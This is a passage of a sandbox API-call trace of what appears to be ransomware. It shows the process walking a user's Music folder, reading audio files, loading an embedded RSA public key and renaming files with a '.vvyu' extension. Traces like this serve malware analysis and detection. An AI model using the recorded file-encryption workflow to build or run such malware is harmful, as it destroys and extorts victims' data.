lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.625] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.626] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.626] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.626] CloseHandle (hObject=0x584) returned 1 [0199.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0199.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0199.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0199.628] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\5B4VEsMcGlm7c.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\5b4vesmcglm7c.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\5B4VEsMcGlm7c.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\5b4vesmcglm7c.mp3.vvyu")) returned 1 [0199.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.630] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.634] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80ffa70, ftCreationTime.dwHighDateTime=0x1d89870, ftLastAccessTime.dwLowDateTime=0xbb4e20f0, ftLastAccessTime.dwHighDateTime=0x1d8a49d, ftLastWriteTime.dwLowDateTime=0xbb4e20f0, ftLastWriteTime.dwHighDateTime=0x1d8a49d, nFileSizeHigh=0x0, nFileSizeLow=0x1134c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8b1WNKi0f8BaPAX.wav", cAlternateFileName="8B1WNK~1.WAV")) returned 1 [0199.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.635] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\8b1WNKi0f8BaPAX.wav") returned=".wav" [0199.635] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\8b1WNKi0f8BaPAX.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\8b1wnki0f8bapax.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.635] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=70476) returned 1 [0199.635] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.639] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11326, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.639] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.641] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.641] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1134c, lpOverlapped=0x0) returned 1 [0199.642] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.643] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.644] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.644] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.644] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.644] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.644] GetLastError () returned 0x0 [0199.644] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.644] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.645] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.645] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.645] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11350) returned 0x2af9168 [0199.646] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade9c8 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adea10 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0199.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.647] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6ae8 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.650] GetCurrentThreadId () returned 0x5d8 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5e70 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.651] GetCurrentThreadId () returned 0x5d8 [0199.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0199.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0199.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b60 [0199.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b78 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adea10 | out: hHeap=0x2c0000) returned 1 [0199.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 